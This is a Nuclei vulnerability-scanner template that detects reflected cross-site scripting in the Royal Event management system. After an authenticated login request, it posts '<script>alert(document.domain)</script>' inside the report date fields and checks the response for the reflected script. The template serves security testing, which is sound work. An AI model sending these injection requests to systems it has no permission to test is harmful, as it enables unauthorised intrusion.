nuclei-templates/vulnerabilities/other/royalevent/royalevent-management-xss.yaml

73 lines
2.0 KiB
YAML

id: royalevent-management-xss
info:
name: Royal Event - Cross-Site Scripting(XSS)
author: ritikchaddha
severity: medium
description: |
Detects an XSS vulnerability in Royal Event System
reference:
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
metadata:
verified: true
tags: xss,authenticated,cms,royalevent
requests:
- raw:
- |
POST /royal_event/ HTTP/1.1
Host: {{Hostname}}
Content-Length: 353
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="login"
------WebKitFormBoundaryCSxQll1eihcqgIgD--
- |
POST /royal_event/btndates_report.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="todate"
2022-12-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="search"
3
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="fromdate"
2022-06-22<script>alert(document.domain)</script>
------WebKitFormBoundaryFboH5ITu7DsGIGrD--
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(document.domain)</script>"
- "Report from "
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200